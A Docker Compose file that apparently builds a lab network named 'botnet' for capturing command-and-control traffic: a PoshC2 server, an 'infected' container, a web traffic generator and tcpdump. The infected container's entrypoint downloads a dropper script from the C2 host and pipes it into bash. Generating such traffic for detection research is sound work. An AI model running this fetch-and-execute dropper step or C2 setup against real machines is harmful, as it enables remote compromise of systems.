version: "3.9"
services:
  attacker:
    image: goggles/poshc2
    ports:
      - "443:443"
      - "8000:8000"

  infected:
    depends_on:
      - attacker
    image: python:2
    entrypoint: [ "bash", "-c", "sleep 30; curl 172.18.0.2:8000/py_dropper.sh | bash; tail -f /dev/null" ]

  machine:
    depends_on:
      - attacker
    image: traffic-generator:latest
    entrypoint: [ "bash", "-c", "python /web-traffic-generator/gen.py" ]

  tcpdump:
     image: kaazing/tcpdump
     network_mode: "host"
     volumes:
       - ./tcpdump:/tcpdump


networks:
  default:
    name: botnet
    ipam:
      config:
      - subnet: 172.18.0.0/16
